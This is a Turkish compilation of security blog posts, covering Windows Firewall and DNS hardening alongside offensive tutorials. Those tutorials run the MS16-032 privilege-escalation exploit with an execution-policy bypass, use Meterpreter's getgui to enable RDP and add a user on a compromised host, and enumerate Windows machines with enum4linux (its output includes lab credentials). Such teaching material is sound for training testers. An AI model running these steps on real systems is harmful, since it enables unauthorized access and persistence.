I. Windows Firewall Nedir ?

Firewall hackerlar, virüsler ve solucanlar gibi bilgisayarınız üzerinden internete erişmeye çalışanları filtreleyen bir uygulamadır. Windows Firewall Windows Server 2003 (Service Pack 1)ve Windows XP (Service Pack 2) itibariyle tüm Windows bilgisayarlarda çalışmakta ve ağ üzerinden gelebilecek saldırıları engellemek için güvenlik sağlamaktadır.

II.Firewall Profili Oluşturma

Windows domain, private ve public olmak üzere 3 ağ profiline sahiptir. Work ve home benzerdir ve private firewall araçlarının altında yer almaktadır. Private, bilgisayarlar ve diğer donanım araçlarının birbirini bulabilmesini sağlayan bir ağ profilidir. Public ise en güvenli profildir. Bu sebeple kafelerde, havalimanlarında vs. kullanılması tavsiye edilen profildir. Eğer ağınızda güvenli olduğundan emin olmadığınız bir bilgisayar varsa, ağ profilinizi “public” olarak ayarlamalısınız. Domain profilini kullanıcılar tarafından seçilemez, bilgisayarınız domain’e katıldıktan sonra kullanılır. Windows Hardening’e başladığımızdan beri, en güvenli ayarları istiyoruz ve Windows’un sadece istendiği zaman iletişim kurmasını sağlamaya çalışıyoruz. Bu sebeple bir domain’e katıldığınızda private ya da public profillerini amacınıza göre seçiniz. Ethernet kablonuzu taktığınızda, en kısıtlayıcı ve güvenli olan Public profilini seçiniz.
Not: Eğer daha önceden Private profilini seçmişseniz ve Public profiline değiştirmek istiyorsanız Windows 10 için tek yöntem PowerShell yardımı ile yapmaktır.

PowerShell’e sağ tıklayıp Yönetici olarak çalıştır seçeneği ile açın.

Sonrasında Get-NetConnectionProfile kodunu yazın ve resimdekine benzer bir çıktı elde edeceksiniz. NetworkCategory : Private olacak sizin çıktınızda.
Sonra ağ adınızı kaydedin ve şunu yazın:
Set-NetConnectionProfile -name “eduroam” -NetworkCategory public burada da eduroam yerine kendi ağınızın adı yer alacak.

III. Windows Advanced Firewall ve Giden Veri Trafiğini Engellemek ve Loglamak

A. Outbound Blocking

Firewall’ların basit ayarları default deny, yani siz izin vermediğiniz sürece tüm trafiği engellidir. Sizin izin verdiğiniz kurallar grubuna da whitelist denir. Windows Firewall’un default ayarları gelenleri engelle ve gidenlere izin ver şeklindedir. “Outbound allow all” konfigurasyonu kolaylaştırır ve engelleme prensibini kullanmaz ki pek ideal değildir çünkü biz zararlı yazılımların yönetici ana serverlarına geri ulaşabilmesini istemeyiz. Outbound Blokcing’i aktif ettiğinizde sadece sizin izin verdiğimiz programlar ve servisler internete erişebilir. Zararlı yazılımlar raporlarını serverlarını ulaştırmakta zorlanırlar. Bu sebeplerden dolayı internete erişmesi gereken bir program kurduğunuzda, antivirüs gibi, tüm exe dosyalarını bir bir kontrol edip hangisinin internete erişmekten sorumlu olduğunu bulmalı ve Windows Firewall Outbound Blocking’de o exe dosyasına ayrıcalık vermelisiniz.

Windows Outbound Blocking’i aktif etmek için Başlat > Arama kısmından Gelişmiş Güvelik ile birlikte Windows Güvenlik Duvarı’nı açın. Alt kısımda bulunan Windows Güvenlik Duvarı Özellikleri’ne tıklayın.

Yukarıda ki Domain ( Etki alanı ), Private ( Özel) ve Public ( Ortak ) profillerinin her biri için;

1- Giden bağlantılar’ı Engelle moduna getirin.

2- Tek noktaya yayın yanıtına izin ver seçeneğini Hayır’a değiştirin.

3- a. Boyut sınırı’nı max. olan 32.767 KB’a getirin.
b. Bırakılan paketleri günlüğe kaydet’i de Evet seçeneğine getirin.Eğer Automated Configuration Pack denilen otomatik konfigure paketiniz varsa sağ tık > yönetici çalıştır diyerek tüm Firewall kural ve profil ayarlarınızı yapabilirsiniz.
B) Firewall Rules

1.Windows servislerini Outbound istisnalarına eklemek için:

Gelişmiş Güvelik ile birlikte Windows Güvenlik Duvarı penceresinde sol tarafta bulunan Giden Kuralları sekmesine tıklayın.

Gelen pencerenin sağ tarafında Yeni Kural… butonuna tıklayıp gelen pencereden Özel seçeneğimi seçin. İleri dedikten sonra Hizmetler’in yanında bulunan özelleştir… butonuna tıklayın.

Bu hizmete uygula seçeneğini işaretledikten sonra Windows Update’i bulun ve Tamam ile çıkın. İleri ile devam edin Protokol ve Bağl. Nokt. Ve Kapsam sekmelerini bir değişiklik yapmadan geçin.

Eylem sekmesinde Bağlantıya izin ver seçeneğini işaretleyin ve devam edin.

Profil sekmesinde tüm seçenekleri işaretleyin ve Ad sekmesinde Rule’a (Kuralınıza) bir isim verin. Örnek “X servisine izin ver”.

2. Bir Programı Outbound istisnalarına eklemek için yine Giden Kuralları sekmeksinden Yeni Kural… butonuna tıklayın.

Gelen ekrandan Program seçeneğini işaretleyip devam edin.

Bu programın yolu seçeneğinden Gözat ile programın .exe uzantılı çalıştırılabilir dosyasını bulup, seçin ve devam edin ve Eylem sekmesine kadar bir değişiklik yapmayın.

Bağlantıya izin ver seçeneğini seçip devam ettikten sonra Profil sekmesindeki tüm seçenekleri işaretleyin.İleyleyip kuralınıza bir isim verdikten sonra bitirin. Örnek “X Programına izin ver”.

3. Outbound Blocking’de hedef port ve IP adrese izin vermek için:

Giden Kuralları sekmesinden Yeni Kural… butonuna tıklayarak açılan pencerede Özel seçeneiğini işaretleyin.

Program sekmesinden Tüm programlar seçeneğini işaretleyin.

1- Protokol ve Bağl. Nokt. Sekmesinde Protokol türü seçeneği için duruma göre TCP ya da UCP seçin.
2- Uzak bağlantı noktası seçeneğinden Belirli bağlantı noktalarını seçip portları girin boşluğa. İleri.

Kapsam sekmesinden Bu kural hangi uzak IP adreslerine uygulanıyor? ‘un altında bulunan Bu IP adresleri seçeneğini işaretleyip Ekle… butonuna tıklayın.

Açılan pencerede Bu IP adresi veya alt ağ seçeneğinin altındaki boşluğa IP adreslerini girin.

Bağlantıya izin ver seçeneğini işaretleyin. İleri. Profil sekmesinde tüm seçenekleri işaretleyin. Ve son olarak porta veya IP adresine verdiğiniz kurala isim verin. Örnek “X portu izni, Y IP’si izni”.

TR | Windows Firewall Sıkılaştırması CypmUni İYTE

DNS nedir?

DNS(Domain Name System), internete bağlanmamızı sağlayan servislerden biri. Bugünlerde hepimiz interneti kullanıyoruz. İnternet, kullanıcısının gözünde milyonlarca internet sitesi, milyarlarca diğer kullanıcı ve sayısız resim, video, yazı ve benzeri demektir. Biz bir kullanıcı olarak internete bağlanmak istediğimizde girmek istediğimiz internet sitesini yazar “Enter” a basar ve internette sörf yaparız. Biz bunu yaparken internete bağlanmamızı sağlayan birçok servis kendi aralarında farklı bir dille anlaşır. Onların dili en basit haliyle 0(sıfır) ve 1(bir)lerden oluşur ve DNS servisi de tam olarak insan ve diğer internet servisleri arasında bir tercüman görevi görür. Mesela ben internet tarayıcımı açıp ve bağlanmak için http://canyoupwm.me yazdığımda kullandığım DNS servisi bu adresi 0 ve 1lerden oluşan dile çevirir ve beni bu şekilde internete bağlar.  Yukarıda DNS’in ne olduğunu ve ne iş yaptığını kabaca tanımlamış olduk.Şimdi de gelin DNS servisimizi nasıl daha güvenli hale getirebilirize bakalım.

Olası Tehditler

DNS servis tehditleri temelde iki gruba ayırılabilir. Söz konusu hackerimiz DNS hizmetinin nasıl çalıştığı üzerinden ilerleyip, biz internete bağlanırken DNS ve diğer hizmetler arasındaki trafiği manipüle ederek sistemimize sızabilir ki bu en çok karşılaşılan DNS sızma şeklidir. Bu yönteme örnek verecek olursak; varsayalım biz bağlanmak istediğimiz internet sitesini girdik ve işi DNS’e bıraktık. DNS yazdığımız internet adresini bize getirmek için diğer hizmetlerle iletişim kurarken hacker DNS hizmetimizi yanlış yönlendirip bizi kendi istediği bir sayfaya veya direk kendi istediği bir dosyaya yönlendirip sistemimize sızabilir. Diğer sızma yöntemleri ise kullanılan bazı DNS servis yazılımlarının(BIND vb.) açıklarıyla saldırmak ve DoS (denial-of-service) saldırısı ile sistemimizi meşgul etmek veya çökertmek daha sonra sızmaya çalışmaktır.DNS Hizmeti Saldırılarına Alınabilecek Önlemler DNS hizmeti konusunda alınabilecek önlemler kullanıcının profiline göre değişiklik gösteriyor. Ortalama bir PC kullanıcısı, bir server(sunucu) yöneticisi, kendi DNS sunucusuna sahip bir kullanıcı için gereken önlemler farklı seviyelerde olmak zorunda. Gelin alabileceğimiz örneklere genelden özele doğru bir bakalım.

Adres Çubuğu Kontrolü

En genel ve en kolay uygulanabilir yöntem olarak internete bağlanırken tarayıcımızın adres çubuğunda yazan internet adresinin tamamıyla doğru olduğuna dikkat etmeliyiz. Kullandığımız harflerin ve rakamların birbirine benzerliğini kullanarak bizi dolandırmak isteyen insanlar kullandığımız internet sitelerinin benzerlerini yapıp bizi kandırabilir. Bu yöntem uygulaması ve önlem alması bakımından diğerlerine göre nispeten basittir. Örnek verecek olursak;

Yukarıda adres çubuğunda yazan paypal’ın orijinal internet adresidir ve paypal kullanacağımız zaman bu adrese girmemiz gerekir.

Bu görselde gördüğümüz ise “1” ve “l” karakterlerinin benzerliği kullanılarak paypal kullanıcılarını dolandırmak amacıyla açılmış sahte bir internet adresidir.İkinci görseldeki internet sitesine girmemek ve dolandırılmamak için yapmamız gereken şey interneti kullanırken adres çubuğumuzda yazan internet adresiyle, gerçekte girmek istediğimiz internet adresinin aynı olduğunu kontrol etmek. Bu kadar basit ve basit olmasına karşın bu şekilde dolandırılan insanlar var. Bu yüzden basit olsa da göz ardı edilmemesi gereken bir önlem.

BIND(Berkeley Internet Name Domain) Kullanmak

BIND 1980’lerin başında Berkeley Üniversitesi kaynaklı tasarlanmış açık kaynaklı ve şuanda en çok kullanılan DNS servis yazılımıdır. BIND sayesinde geçen yıllarda DNS üzerinden gerçekleşen birçok tehdit engellendi ve bugün de BIND yoluna açık kaynaklı haliyle DNS tehditlerini engellemek için devam ediyor. BIND kullanmak sizi %100 güvenli yapmaz ama eski DNS açıklarını kapatmış olursunuz ve BIND yazılımını güncel olarak kullanırsanız da en son kapatılan açıklardan da etkilenmezsiniz. Aşağıdaki linklerden İngilizce olarak BIND hakkında resmi bir açıklama ve Windows için indirme linkini bulabilirsiniz.

https://www.isc.org/downloads/bind/
https://www.isc.org/downloads/

Birden Fazla DNS Servisinin Yönetimi

Eğer ihtiyaç gereği birden fazla DNS servisi kullanıyorsanız tedbir olarak, bu servisleri aynı subnet(alt ağ) üzerinden ve hatta aynı router ya da aynı özel hat üzerinden kullanmayın. Bunları farklı kullanmak size esneklik sağlar ve en azından bir DNS servisinize sızılsa bile diğer DNS servisleriniz güvende kalmaya devam edecektir.

TR | DNS Servis Sıkılaştırma CypmUni İYTE

 

• Disk yönetiminden USB belleğimizin harfini A  olarak değiştiriyoruz.

• Şimdi Syskey ‘i etkinleştirebiliriz, başlat’a Syskey  yazarak çalıştırıyoruz,

TR | Windows Hesap Parola Yönetimi CypmUni İYTE

Powershell betiğini kullanarak bu MS16-32 zafiyeti ile hak yükseltme saldırısıdır. Bu zafiyet Secondary Logon servisindeki bug dan kaynaklanıyor.

Secondary Logon servisi; Windows işletim sisteminde oturumu kapatmadan farklı bir kullanıcı olarak sistemde bir oturum elde etme veya komut çalıştırmadır. Örneğin “Run as” yani “farklı çalıştır” komutu windows işletim sisteminde, herhangi bir programı veya servisi giriş yapmış olduğunuz kullanıcıdan farklı bir kullanıcı hesabıyla çıkış yapmadan kullanabilmenizi sağlar.

Bu zafiyetten etkilenen systemler: vista, 7, 8.1,10, windows server 2008, 2012

Exploit

Not: İstismarın gerçekleşmesi için işletim sisteminin en az 2 çekirdeği olmalıdır.

• Exlolit kodunu

  exploit-db.com/exploits/39719/

  adresinden elde edebilirsiniz.

• Betik çalıştırılmadan önce normal bir user olarak oturum açıyoruz.
• Indirilen exploitimizi module import yapıyoruz

  Import-Module .\MS16-032.ps1

   

• Yukarıda ki gibi hata alabilirsiniz. Çünkü scriptlerin çalıştırılma özelliği kapalıdır. Bunu aktif hale getirmek için “powershell.exe -ExecutionPolicy Bypass” komutunu yazarak aktif hale getirebiliriz

• En son olarak da çalıştırdığımızda betiğimizi. Bu komut ile “Invoke-MS16-032”

• Mutlu son

TR | System Privilege Escalation Vulnerability (MS16-032) CanYouPwnMe

Bu yazımda ele geçirilmiş bir sistemde, kali ve ya metasploit kurulu her hangi bir linux dağıtımı üzerinden nasıl RDP (Remote Desktop Protocol) bağlantı sağlanabileceğini anlatacağım.  Ben örnekte Psexec ile sisteme giriş yaptım. Aynı zamanda netapi gibi bir çok yöntemlede erişim sağlayabilirsiniz.

Bazı sistemlerde Uzak Masaüstü Erişimi özellikle kapatılmış ve ya default olarak kapalı gelebilir.

Resimde görüldüğü üzere sızdığımız sistemde Remote Desktop özelliği kapalı. RDP seçeneğini aktive etmek için regeditte işlem yapan ve meterpreter’ın içinde bulunan getgui scriptinden faydalanabiliriz.

Öncelikle meterpreter ekranında run getgui –h yazalım ve seçeneklerimizi görüntüleyelim.

Görüldüğü üzere RDP bağlantığımızı etkinleştirmek için öncelikle run getgui –e komutunu çalıştırmalıyız.

Yukarıda da görüldüğü gibi RDP is disabled, enabling it… çıktısını verdi ve RDP’nin öncesinde kapalı olduğunu, şimdi ise açıldığını yazdı.

Komuttan sonra hedef sistemimizi tekrar incelediğimizde Uzaktan Masaüstü Bağlantısı(RDP) izninin aktive edilmiş olduğunu göreceğiz.

RDP bağlantımızı etkinleştirdikten sonra yapmamız gereken işlem run getgui –u <kullanıcı adı> -p <parola> komutu ile bir kullanıcı adı ve parola belirlemek ve kullanıcı oluşturmak.

run getgui –u testuser –p testpass komutu ile RDP bağlantısı için bir kullanıcı oluşturduk. Buradaki önemli bir diğer konu eğer RDP yetkisine sahip (admin gibi) bir kullanıcı bilgilerine sahipseniz buradaki aşamayı geçebilir ve direk o kullanıcının kullanıcı adı ve şifresiyle bağlanabilirsiniz. Mevcut kullanıcı ile giriş yapmak loglama açısından daha verimli olacaktır.

Ben bu yazımda kullanıcı adı ve parola bilmediğimi baz alaraktan yeni bir kullanıcı oluşturdum ve o kullanıcı bilgileri ile giriş yapacağım. Bunun için yeni bir konsol ekranında (meterpreter ekranında yazmamanız önemli) rdesktop <hedef-ip> -u <k.adı> -p <password> komutu ile hedef bilgisayara RDP bağlantısı açıyoruz.

Mevcut sistemde rdesktop çalışmıyorsa, paketleriniz eksik yada kurulu olmayabilir. Bu sorunu gidermek için komut satırına apt-get install xrdp yazarak rdesktop kurulumunu yapmanız gerekecektir.

Görüldüğü gibi RDP bağlantımız açıldı ve bizden oluşturduğumuz kullanıcı adı ve parolayı istiyor. Bu kullanıcı adı ve parolayı girdiğimizde hedef bilgisayarın masaüstüne uzaktan bağlantı kurmuş olacağız.

Yazımı bitirmeden önce belirtmek istediğim bir nokta, bu işlemlerin çokça iz ve log bırakacağıdır. Özellikle blackbox testlerde buna özen gösterilmesi gerekmektedir. Bir sonraki yazıda görüşmek dileğiyle.

TR | Meterpreter ile RDP (Remote Desktop Protocol) Bağlantı Kurmak Mert Gücü

Windows Enumeration
Selamlar,Linux enumeration konusunu görmüşsünüzdür sanırım.Windows için durum biraz farklı şöyle farklı bir çok tool bulunuyor ve odak noktanıza göre kullanacağınız araç/tool değişebiliyor.
Nedir bu Enumeration ?
Enumeration, bağlandığınız bir bilgisayarın bilgilerini almak istediniz fakat sistemlerde o kadar çok komut var ki hepsini tek tek almak zaman kaybına yol açacak örnek vermek gerekirse :

 wmic logicaldisk get caption,description,providername

Bu kod bize Windows da yerel disklerimizin isimlerini , diskin tanımını , var ise bu diskin sağlandığı yeri gösteriyor. ( Shared disk vs. )

Bu kodlar bize zaman kaybettiriyor ve bazen gerçekten 1 saniyenin bile önemi oldukça fazla.
Şimdi burada ilk önce Nbtscan aracından bahsedeceğiz.
Nedir bu araç ?
Bize Windows üzerinde Workgroup bilgilerini verecek.

Yukarıda gördüğünüz gibi bazı parametreler alması gerekiyor hemen bunlara örnekler verelim.

 ntbscan.exe –f 192.168.1.4 > workgroup.txt

Yazdığımızda bize bilgisayarda ki WORKGROUP’da ki kullanıcı adımı ve bilgisayarda ki domain name,services isimlerini gösterecek ve bunu netbios.txt dosyasına yazdıracaktır.

nbtscan.exe –m 192.168.1.4

Yazdığımızda ise bize MAC Adresi ile birlikte kullanıcının bilgisini verecektir.

En çok kullanacağınız parametre –f parametresidir. Dilerseniz bir ip aralığını da aratabilirsiniz.

nbtscan.exe –f 192.168.1.0/24

Sırada ki aracımız DumpSec
DumpSec
Dumpsec GUI(Graphical User Interface)’ye yani grafiksel bir arayüze sahip bir araçtır.
Aracı açtığımızda bizi boş bir sayfa karşılar ama yukarıdan Report menüsünden istediğiniz kısımların raporlarını alabilirsiniz.Bu tool NbtScan’a göre daha fazla rapor olanağı sunar.
Şimdi örnek ekran görüntülerine bakalım.

Burada Windows klasörü altında ki dosyaların sahipleri dosya izinlerini toplu halde görebiliyorsunuz. İsterseniz File kısmından yazdırabilirsiniz.
Bir altta ki resimde ise localhost üzerinde ki kullanıcıları ve istediğiniz sütunları gösterebilirsiniz.

Enum4Linux
Kali’de build-in olarak gelen bir araçtır.Herhangi bir şekilde Windows kullanıcı adı ve parolasını ( var ise ) ele geçirmişseniz daha yararlı olucaktır.
Şimdi kullanımına gelirsek.

enum4linux –u username –p password –o –U ipadresi

Bu kod bize –U argümanında görüldüğü üzere işletim sistemi üstünde ki kullanıcı adlarını vericek.Diğer bir argüman olan –o ise bize işletim sistemi hakkında bilgi vericektir.

Dikkat edilmesi gereken burada şifre ve kullanıcı adını bildiğimden dolayı fazlaca bilginin olmasıdır.Birde username password girmeden çıktısını görelim.

enum4linux –U –o 192.168.1.3

Diğer argümanlar nelerdir onlara bakalım şimdi de.

enum4linux –u username –p password –o –G –U 192.168.1.3 >> cikti.txt

Çıktısı bize çalışma alanında ki kullanıcılarla birlikte vericek.
Çıktımız aşağıda ki şekildedir.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Apr 13 23:19:33 2016

==========================
| Target Information |
==========================
Target ........... 192.168.1.3
RID Range ........ 500-550,1000-1050
Username ......... 'ka1'
Password ......... 'cypm123'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

===================================================
| Enumerating Workgroup/Domain on 192.168.1.3 |
===================================================
[+] Got domain/workgroup name: WORKGROUP

====================================
| Session Check on 192.168.1.3 |
====================================
[+] Server 192.168.1.3 allows sessions using username 'ka1', password 'cypm123'

==========================================
| Getting domain SID for 192.168.1.3 |
==========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=====================================
| OS information on 192.168.1.3 |
=====================================
[+] Got OS info for 192.168.1.3 from smbclient: Domain=[KA1-BILGISAYAR] OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
[+] Got OS info for 192.168.1.3 from srvinfo:
192.168.1.3 Wk Sv Sql NT PtB LMB
platform_id : 500
os version : 6.1
server type : 0x51007

============================
| Users on 192.168.1.3 |
============================
index: 0x1 RID: 0x1f4 acb: 0x00000211 Account: Administrator Name: (null) Desc: Bilgisayarı/etki alanını yönetmede kullanılan önceden tanımlı hesap
index: 0x2 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Bilgisayara/etki alanına konuk erişiminde kullanılan önceden tanımlı hesap
index: 0x3 RID: 0x3e8 acb: 0x00000214 Account: ka1 Name: (null) Desc: (null)
index: 0x4 RID: 0x3ea acb: 0x00000210 Account: Rust Name: Rust Desc: (null)
index: 0x5 RID: 0x3e9 acb: 0x00000210 Account: UpdatusUser Name: UpdatusUser Desc: Used to provide NVIDIA software updates

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[ka1] rid:[0x3e8]
user:[Rust] rid:[0x3ea]
user:[UpdatusUser] rid:[0x3e9]

=============================
| Groups on 192.168.1.3 |
=============================

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Cryptographic Operators] rid:[0x239]
group:[Distributed COM Users] rid:[0x232]
group:[Event Log Readers] rid:[0x23d]
group:[Guests] rid:[0x222]
group:[IIS_IUSRS] rid:[0x238]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Log Users] rid:[0x22f]
group:[Performance Monitor Users] rid:[0x22e]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'IIS_IUSRS' (RID: 568) has member: NT AUTHORITY\IUSR

[+] Getting local groups:
group:[SQLServer2005SQLBrowserUser$KA1-BILGISAYAR] rid:[0x3ed]
group:[SQLServerMSSQLServerADHelperUser$KA1-BILGISAYAR] rid:[0x3ec]
group:[SQLServerMSSQLUser$ka1-Bilgisayar$SQLEXPRESS] rid:[0x3ee]
group:[SQLServerSQLAgentUser$KA1-BILGISAYAR$SQLEXPRESS] rid:[0x3ef]
group:[__vmware__] rid:[0x3eb]

[+] Getting local group memberships:
Group 'SQLServerMSSQLServerADHelperUser$KA1-BILGISAYAR' (RID: 1004) has member: NT AUTHORITY\NETWORK SERVICE
Group 'SQLServerMSSQLServerADHelperUser$KA1-BILGISAYAR' (RID: 1004) has member: NT AUTHORITY\SYSTEM
Group 'SQLServerSQLAgentUser$KA1-BILGISAYAR$SQLEXPRESS' (RID: 1007) has member: NT SERVICE\SQLAgent$SQLEXPRESS
Group 'SQLServerMSSQLUser$ka1-Bilgisayar$SQLEXPRESS' (RID: 1006) has member: cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \lsarpc failed with error NT_STATUS_IO_DEVICE_ERROR
Group 'SQLServerMSSQLUser$ka1-Bilgisayar$SQLEXPRESS' (RID: 1006) has member: Couldn't open LSA pipe. Error was NT_STATUS_IO_DEVICE_ERROR
Group 'SQLServer2005SQLBrowserUser$KA1-BILGISAYAR' (RID: 1005) has member: NT SERVICE\SQLBrowser

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ka1-Bilgisayar\Administrator
Group 'None' (RID: 513) has member: ka1-Bilgisayar\Guest
Group 'None' (RID: 513) has member: ka1-Bilgisayar\ka1
Group 'None' (RID: 513) has member: ka1-Bilgisayar\UpdatusUser
Group 'None' (RID: 513) has member: ka1-Bilgisayar\Rust
enum4linux complete on Wed Apr 13 23:19:35 2016

Eğer çok daha fazla bilgi isterseniz –a argümanını kullanabilirsiniz.

Ek Bilgi :
Eğer Metasploit sayesinde meterpreter session oluşturmuş iseniz ,kullanıcı adı ve şifresine ulaşmışsanız aşağıda ki kodlar da işe yarıyacaktır.

run remotewinenum -u username -p password

#Birçok dump dosyasını alır.

 scraper

# Registry kayıtlarını alır.

winenum

# Birçok dump dosyasını alır.

TR | Windows Enumeration Enes ERGÜN